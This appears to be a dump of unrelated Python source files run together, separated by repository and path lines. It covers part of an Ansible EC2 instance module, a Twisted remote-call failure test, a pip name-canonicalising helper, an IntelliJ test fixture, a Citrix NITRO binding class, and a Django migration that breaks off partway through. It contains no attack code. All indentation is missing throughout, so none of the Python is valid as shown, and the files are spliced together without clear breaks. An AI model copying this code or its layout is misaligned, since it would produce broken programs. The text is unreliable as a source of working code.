termination_protection = module.params.get('termination_protection')
group_id = module.params.get('group_id')
group_name = module.params.get('group')
changed = False
instance_dict_array = []
if not isinstance(instance_ids, list) or len(instance_ids) < 1:
# Fail unless the user defined instance tags
if not instance_tags:
module.fail_json(msg='instance_ids should be a list of instances, aborting')
# To make an EC2 tag filter, we need to prepend 'tag:' to each key.
# An empty filter does no filtering, so it's safe to pass it to the
# get_all_instances method even if the user did not specify instance_tags
filters = {}
if instance_tags:
for key, value in instance_tags.items():
filters["tag:" + key] = value
if module.params.get('id'):
filters['client-token'] = module.params['id']
# Check that our instances are not in the state we want to take
# Check (and eventually change) instances attributes and instances state
existing_instances_array = []
for res in ec2.get_all_instances(instance_ids, filters=filters):
for inst in res.instances:
# Check "source_dest_check" attribute
try:
if inst.vpc_id is not None and inst.get_attribute('sourceDestCheck')['sourceDestCheck'] != source_dest_check:
inst.modify_attribute('sourceDestCheck', source_dest_check)
changed = True
except boto.exception.EC2ResponseError as exc:
# instances with more than one Elastic Network Interface will
# fail, because they have the sourceDestCheck attribute defined
# per-interface
if exc.code == 'InvalidInstanceID':
for interface in inst.interfaces:
if interface.source_dest_check != source_dest_check:
ec2.modify_network_interface_attribute(interface.id, "sourceDestCheck", source_dest_check)
changed = True
else:
module.fail_json(msg='Failed to handle source_dest_check state for instance {0}, error: {1}'.format(inst.id, exc),
exception=traceback.format_exc())
# Check "termination_protection" attribute
if (inst.get_attribute('disableApiTermination')['disableApiTermination'] != termination_protection and termination_protection is not None):
inst.modify_attribute('disableApiTermination', termination_protection)
changed = True
# Check security groups and if we're using ec2-vpc; ec2-classic security groups may not be modified
if inst.vpc_id and group_name:
grp_details = ec2.get_all_security_groups(filters={'vpc_id': inst.vpc_id})
if isinstance(group_name, string_types):
group_name = [group_name]
unmatched = set(group_name) - set(to_text(grp.name) for grp in grp_details)
if unmatched:
module.fail_json(msg="The following group names are not valid: %s" % ', '.join(unmatched))
group_ids = [to_text(grp.id) for grp in grp_details if to_text(grp.name) in group_name]
elif inst.vpc_id and group_id:
if isinstance(group_id, string_types):
group_id = [group_id]
grp_details = ec2.get_all_security_groups(group_ids=group_id)
group_ids = [grp_item.id for grp_item in grp_details]
if inst.vpc_id and (group_name or group_id):
if set(sg.id for sg in inst.groups) != set(group_ids):
changed = inst.modify_attribute('groupSet', group_ids)
# Check instance state
if inst.state != state:
instance_dict_array.append(get_instance_info(inst))
try:
if state == 'running':
inst.start()
else:
inst.stop()
except EC2ResponseError as e:
module.fail_json(msg='Unable to change state for instance {0}, error: {1}'.format(inst.id, e))
changed = True
existing_instances_array.append(inst.id)
instance_ids = list(set(existing_instances_array + (instance_ids or [])))
# Wait for all the instances to finish starting or stopping
wait_timeout = time.time() + wait_timeout
while wait and wait_timeout > time.time():
instance_dict_array = []
matched_instances = []
for res in ec2.get_all_instances(instance_ids):
for i in res.instances:
if i.state == state:
instance_dict_array.append(get_instance_info(i))
matched_instances.append(i)
if len(matched_instances) < len(instance_ids):
time.sleep(5)
else:
break
if wait and wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg="wait for instances running timeout on %s" % time.asctime())
return (changed, instance_dict_array, instance_ids)
def restart_instances(module, ec2, instance_ids, state, instance_tags):
"""
Restarts a list of existing instances
module: Ansible module object
ec2: authenticated ec2 connection object
instance_ids: The list of instances to start in the form of
[ {id: <inst-id>}, ..]
instance_tags: A dict of tag keys and values in the form of
{key: value, ... }
state: Intended state ("restarted")
Returns a dictionary of instance information
about the instances.
If the instance was not able to change state,
"changed" will be set to False.
Wait will not apply here as this is a OS level operation.
Note that if instance_ids and instance_tags are both non-empty,
this method will process the intersection of the two.
"""
source_dest_check = module.params.get('source_dest_check')
termination_protection = module.params.get('termination_protection')
changed = False
instance_dict_array = []
if not isinstance(instance_ids, list) or len(instance_ids) < 1:
# Fail unless the user defined instance tags
if not instance_tags:
module.fail_json(msg='instance_ids should be a list of instances, aborting')
# To make an EC2 tag filter, we need to prepend 'tag:' to each key.
# An empty filter does no filtering, so it's safe to pass it to the
# get_all_instances method even if the user did not specify instance_tags
filters = {}
if instance_tags:
for key, value in instance_tags.items():
filters["tag:" + key] = value
if module.params.get('id'):
filters['client-token'] = module.params['id']
# Check that our instances are not in the state we want to take
# Check (and eventually change) instances attributes and instances state
for res in ec2.get_all_instances(instance_ids, filters=filters):
for inst in res.instances:
# Check "source_dest_check" attribute
try:
if inst.vpc_id is not None and inst.get_attribute('sourceDestCheck')['sourceDestCheck'] != source_dest_check:
inst.modify_attribute('sourceDestCheck', source_dest_check)
changed = True
except boto.exception.EC2ResponseError as exc:
# instances with more than one Elastic Network Interface will
# fail, because they have the sourceDestCheck attribute defined
# per-interface
if exc.code == 'InvalidInstanceID':
for interface in inst.interfaces:
if interface.source_dest_check != source_dest_check:
ec2.modify_network_interface_attribute(interface.id, "sourceDestCheck", source_dest_check)
changed = True
else:
module.fail_json(msg='Failed to handle source_dest_check state for instance {0}, error: {1}'.format(inst.id, exc),
exception=traceback.format_exc())
# Check "termination_protection" attribute
if (inst.get_attribute('disableApiTermination')['disableApiTermination'] != termination_protection and termination_protection is not None):
inst.modify_attribute('disableApiTermination', termination_protection)
changed = True
# Check instance state
if inst.state != state:
instance_dict_array.append(get_instance_info(inst))
try:
inst.reboot()
except EC2ResponseError as e:
module.fail_json(msg='Unable to change state for instance {0}, error: {1}'.format(inst.id, e))
changed = True
return (changed, instance_dict_array, instance_ids)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
key_name=dict(aliases=['keypair']),
id=dict(),
group=dict(type='list', aliases=['groups']),
group_id=dict(type='list'),
zone=dict(aliases=['aws_zone', 'ec2_zone']),
instance_type=dict(aliases=['type']),
spot_price=dict(),
spot_type=dict(default='one-time', choices=["one-time", "persistent"]),
spot_launch_group=dict(),
image=dict(),
kernel=dict(),
count=dict(type='int', default='1'),
monitoring=dict(type='bool', default=False),
ramdisk=dict(),
wait=dict(type='bool', default=False),
wait_timeout=dict(default=300),
spot_wait_timeout=dict(default=600),
placement_group=dict(),
user_data=dict(),
instance_tags=dict(type='dict'),
vpc_subnet_id=dict(),
assign_public_ip=dict(type='bool', default=False),
private_ip=dict(),
instance_profile_name=dict(),
instance_ids=dict(type='list', aliases=['instance_id']),
source_dest_check=dict(type='bool', default=True),
termination_protection=dict(type='bool', default=None),
state=dict(default='present', choices=['present', 'absent', 'running', 'restarted', 'stopped']),
instance_initiated_shutdown_behavior=dict(default=None, choices=['stop', 'terminate']),
exact_count=dict(type='int', default=None),
count_tag=dict(),
volumes=dict(type='list'),
ebs_optimized=dict(type='bool', default=False),
tenancy=dict(default='default'),
network_interfaces=dict(type='list', aliases=['network_interface'])
)
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=[
['group_name', 'group_id'],
['exact_count', 'count'],
['exact_count', 'state'],
['exact_count', 'instance_ids'],
['network_interfaces', 'assign_public_ip'],
['network_interfaces', 'group'],
['network_interfaces', 'group_id'],
['network_interfaces', 'private_ip'],
['network_interfaces', 'vpc_subnet_id'],
],
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
if module.params.get('region') or not module.params.get('ec2_url'):
ec2 = ec2_connect(module)
elif module.params.get('ec2_url'):
ec2 = connect_ec2_endpoint(ec2_url, **aws_connect_kwargs)
if 'region' not in aws_connect_kwargs:
aws_connect_kwargs['region'] = ec2.region
vpc = connect_vpc(**aws_connect_kwargs)
except boto.exception.NoAuthHandlerFound as e:
module.fail_json(msg="Failed to get connection: %s" % e.message, exception=traceback.format_exc())
tagged_instances = []
state = module.params['state']
if state == 'absent':
instance_ids = module.params['instance_ids']
if not instance_ids:
module.fail_json(msg='instance_ids list is required for absent state')
(changed, instance_dict_array, new_instance_ids) = terminate_instances(module, ec2, instance_ids)
elif state in ('running', 'stopped'):
instance_ids = module.params.get('instance_ids')
instance_tags = module.params.get('instance_tags')
if not (isinstance(instance_ids, list) or isinstance(instance_tags, dict)):
module.fail_json(msg='running list needs to be a list of instances or set of tags to run: %s' % instance_ids)
(changed, instance_dict_array, new_instance_ids) = startstop_instances(module, ec2, instance_ids, state, instance_tags)
elif state in ('restarted'):
instance_ids = module.params.get('instance_ids')
instance_tags = module.params.get('instance_tags')
if not (isinstance(instance_ids, list) or isinstance(instance_tags, dict)):
module.fail_json(msg='running list needs to be a list of instances or set of tags to run: %s' % instance_ids)
(changed, instance_dict_array, new_instance_ids) = restart_instances(module, ec2, instance_ids, state, instance_tags)
elif state == 'present':
# Changed is always set to true when provisioning new instances
if not module.params.get('image'):
module.fail_json(msg='image parameter is required for new instance')
if module.params.get('exact_count') is None:
(instance_dict_array, new_instance_ids, changed) = create_instances(module, ec2, vpc)
else:
(tagged_instances, instance_dict_array, new_instance_ids, changed) = enforce_count(module, ec2, vpc)
module.exit_json(changed=changed, instance_ids=new_instance_ids, instances=instance_dict_array, tagged_instances=tagged_instances)
if __name__ == '__main__':
main()
|
exelearning/iteexe
|
refs/heads/master
|
twisted/test/test_pbfailure.py
|
16
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.trial import unittest
from twisted.spread import pb, flavors, jelly
from twisted.internet import reactor, defer
from twisted.python import log, failure
##
# test exceptions
##
class PoopError(Exception): pass
class FailError(Exception): pass
class DieError(Exception): pass
class TimeoutError(Exception): pass
#class JellyError(flavors.Jellyable, pb.Error): pass
class JellyError(flavors.Jellyable, pb.Error, pb.RemoteCopy): pass
class SecurityError(pb.Error, pb.RemoteCopy): pass
pb.setUnjellyableForClass(JellyError, JellyError)
pb.setUnjellyableForClass(SecurityError, SecurityError)
pb.globalSecurity.allowInstancesOf(SecurityError)
####
# server-side
####
class SimpleRoot(pb.Root):
def remote_poop(self):
return defer.fail(failure.Failure(PoopError("Someone threw poopie at me!")))
def remote_fail(self):
raise FailError("I'm a complete failure! :(")
def remote_die(self):
raise DieError("*gack*")
def remote_jelly(self):
self.raiseJelly()
def remote_security(self):
self.raiseSecurity()
def remote_deferredJelly(self):
d = defer.Deferred()
d.addCallback(self.raiseJelly)
d.callback(None)
return d
def remote_deferredSecurity(self):
d = defer.Deferred()
d.addCallback(self.raiseSecurity)
d.callback(None)
return d
def raiseJelly(self, results=None):
raise JellyError("I'm jellyable!")
def raiseSecurity(self, results=None):
raise SecurityError("I'm secure!")
class PBConnTestCase(unittest.TestCase):
unsafeTracebacks = 0
def setUp(self):
self._setUpServer()
self._setUpClient()
def _setUpServer(self):
self.serverFactory = pb.PBServerFactory(SimpleRoot())
self.serverFactory.unsafeTracebacks = self.unsafeTracebacks
self.serverPort = reactor.listenTCP(0, self.serverFactory, interface="127.0.0.1")
def _setUpClient(self):
portNo = self.serverPort.getHost().port
self.clientFactory = pb.PBClientFactory()
self.clientConnector = reactor.connectTCP("127.0.0.1", portNo, self.clientFactory)
def tearDown(self):
return defer.gatherResults([
self._tearDownServer(),
self._tearDownClient()])
def _tearDownServer(self):
return defer.maybeDeferred(self.serverPort.stopListening)
def _tearDownClient(self):
self.clientConnector.disconnect()
return defer.succeed(None)
class PBFailureTest(PBConnTestCase):
compare = unittest.TestCase.assertEquals
def testPBFailures(self):
d = self.clientFactory.getRootObject()
d.addCallback(self.connected)
d.addCallback(self.cleanupLoggedErrors)
return d
def testCopiedFailureLogging(self):
d = self.clientFactory.getRootObject()
def connected(rootObj):
return rootObj.callRemote('die')
d.addCallback(connected)
def exception(failure):
log.err(failure)
errs = log.flushErrors(DieError)
self.assertEquals(len(errs), 2)
d.addErrback(exception)
return d
def addFailingCallbacks(self, remoteCall, expectedResult, eb):
remoteCall.addCallbacks(self.success, eb,
callbackArgs=(expectedResult,))
return remoteCall
##
# callbacks
##
def cleanupLoggedErrors(self, ignored):
errors = log.flushErrors(PoopError, FailError, DieError,
AttributeError, JellyError, SecurityError)
self.assertEquals(len(errors), 6)
return ignored
def connected(self, persp):
methods = (('poop', 42, self.failurePoop),
('fail', 420, self.failureFail),
('die', 4200, self.failureDie),
('nosuch', 42000, self.failureNoSuch),
('jelly', 43, self.failureJelly),
('security', 430, self.failureSecurity),
('deferredJelly', 4300, self.failureDeferredJelly),
('deferredSecurity', 43000, self.failureDeferredSecurity))
return defer.gatherResults([
self.addFailingCallbacks(persp.callRemote(meth), result, eb)
for (meth, result, eb) in methods])
def success(self, result, expectedResult):
self.assertEquals(result, expectedResult)
return result
def failurePoop(self, fail):
fail.trap(PoopError)
self.compare(fail.traceback, "Traceback unavailable\n")
return 42
def failureFail(self, fail):
fail.trap(FailError)
self.compare(fail.traceback, "Traceback unavailable\n")
return 420
def failureDie(self, fail):
fail.trap(DieError)
self.compare(fail.traceback, "Traceback unavailable\n")
return 4200
def failureNoSuch(self, fail):
fail.trap(pb.NoSuchMethod)
self.compare(fail.traceback, "Traceback unavailable\n")
return 42000
def failureJelly(self, fail):
fail.trap(JellyError)
self.failIf(isinstance(fail.type, str))
self.failUnless(isinstance(fail.value, fail.type))
return 43
def failureSecurity(self, fail):
fail.trap(SecurityError)
self.failIf(isinstance(fail.type, str))
self.failUnless(isinstance(fail.value, fail.type))
return 430
def failureDeferredJelly(self, fail):
fail.trap(JellyError)
self.failIf(isinstance(fail.type, str))
self.failUnless(isinstance(fail.value, fail.type))
return 4300
def failureDeferredSecurity(self, fail):
fail.trap(SecurityError)
self.failIf(isinstance(fail.type, str))
self.failUnless(isinstance(fail.value, fail.type))
return 43000
class PBFailureTestUnsafe(PBFailureTest):
compare = unittest.TestCase.failIfEquals
unsafeTracebacks = 1
|
oswalpalash/remoteusermgmt
|
refs/heads/master
|
RUM/lib/python2.7/site-packages/pip/_vendor/packaging/utils.py
|
1126
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import re
_canonicalize_regex = re.compile(r"[-_.]+")
def canonicalize_name(name):
# This is taken from PEP 503.
return _canonicalize_regex.sub("-", name).lower()
|
alphafoobar/intellij-community
|
refs/heads/master
|
python/testData/codeInsight/controlflow/assertfalseargument.py
|
83
|
assert False, 'foo'
print('unreachable 1')
assert False, f()
print('unreachable 2')
|
mahabs/nitro
|
refs/heads/master
|
nssrc/com/citrix/netscaler/nitro/resource/config/appflow/appflowpolicylabel_binding.py
|
1
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class appflowpolicylabel_binding(base_resource):
""" Binding class showing the resources that can be bound to appflowpolicylabel_binding.
"""
def __init__(self) :
self._labelname = ""
self.appflowpolicylabel_appflowpolicy_binding = []
@property
def labelname(self) :
"""Name of the policy label about which to display detailed information.<br/>Minimum length = 1.
"""
try :
return self._labelname
except Exception as e:
raise e
@labelname.setter
def labelname(self, labelname) :
"""Name of the policy label about which to display detailed information.<br/>Minimum length = 1
"""
try :
self._labelname = labelname
except Exception as e:
raise e
@property
def appflowpolicylabel_appflowpolicy_bindings(self) :
"""appflowpolicy that can be bound to appflowpolicylabel.
"""
try :
return self._appflowpolicylabel_appflowpolicy_binding
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(appflowpolicylabel_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.appflowpolicylabel_binding
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.labelname) :
return str(self.labelname)
return None
except Exception as e :
raise e
@classmethod
def get(self, service, labelname) :
""" Use this API to fetch appflowpolicylabel_binding resource.
"""
try :
if type(labelname) is not list :
obj = appflowpolicylabel_binding()
obj.labelname = labelname
response = obj.get_resource(service)
else :
if labelname and len(labelname) > 0 :
obj = [appflowpolicylabel_binding() for _ in range(len(labelname))]
for i in range(len(labelname)) :
obj[i].labelname = labelname[i];
response[i] = obj[i].get_resource(service)
return response
except Exception as e:
raise e
class appflowpolicylabel_binding_response(base_response) :
def __init__(self, length=1) :
self.appflowpolicylabel_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.appflowpolicylabel_binding = [appflowpolicylabel_binding() for _ in range(length)]
|
inspyration/django-gluon
|
refs/heads/master
|
gluon/util/migrations/0001_initial.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
import base.fields
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Browser',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_browser_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_browser_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_browser_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'Browser',
'verbose_name_plural': 'Browsers',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('alpha2', models.CharField(unique=True, verbose_name='alpha2', max_length=2, help_text='Two letters code')),
('alpha3', models.CharField(unique=True, verbose_name='alpha3', max_length=3, help_text='Three letters code')),
('number', models.PositiveSmallIntegerField(unique=True, verbose_name='number', help_text='Three digits number code')),
('name_fr', models.CharField(unique=True, verbose_name='french name', max_length=2, help_text='French common name of the country')),
('name_en', models.CharField(unique=True, verbose_name='english name', max_length=3, help_text='English common name of the country')),
('usage', models.CharField(unique=True, verbose_name='usage name', max_length=3, help_text='Usage name (localised)')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_country_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_country_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_country_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'country',
'verbose_name_plural': 'countries',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='HtmlTag',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_htmltag_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_htmltag_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_htmltag_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'Html tag',
'verbose_name_plural': 'Html tags',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='HttpResource',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('path', models.CharField(verbose_name='path', blank=True, max_length=127, help_text='Path to the (hosted) resource')),
('browser', models.ForeignKey(verbose_name='browser', related_name='browser_httpresource_set', to='util.Browser', help_text='Specific Browser (potentially with version number)')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_httpresource_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_httpresource_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_httpresource_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
('tag', models.ForeignKey(verbose_name='tag', related_name='tag_httpresource_set', to='util.HtmlTag', help_text='HTML Tag used to call this resource')),
],
options={
'verbose_name': 'Http resource',
'verbose_name_plural': 'Http resources',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='HttpResourcesConfig',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_httpresourcesconfig_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_httpresourcesconfig_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_httpresourcesconfig_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
('resources', models.ManyToManyField(verbose_name='HTTP resources', to='util.HttpResource', related_name='view_set', blank=True, help_text='List of resources used by this view (CSS, JS, Meta, ...)')),
],
options={
'verbose_name': 'Http resources configuration',
'verbose_name_plural': 'Http resources configurations',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Keyword',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_keyword_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_keyword_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_keyword_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'keyword',
'verbose_name_plural': 'keywords',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Locale',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_locale_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_locale_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_locale_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'locale',
'verbose_name_plural': 'locales',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Mime',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('reference', models.CharField(verbose_name='reference', blank=True, max_length=127, help_text='Mime type reference')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_mime_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_mime_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_mime_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'MIME type',
'verbose_name_plural': 'MIME types',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MimeRegistry',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
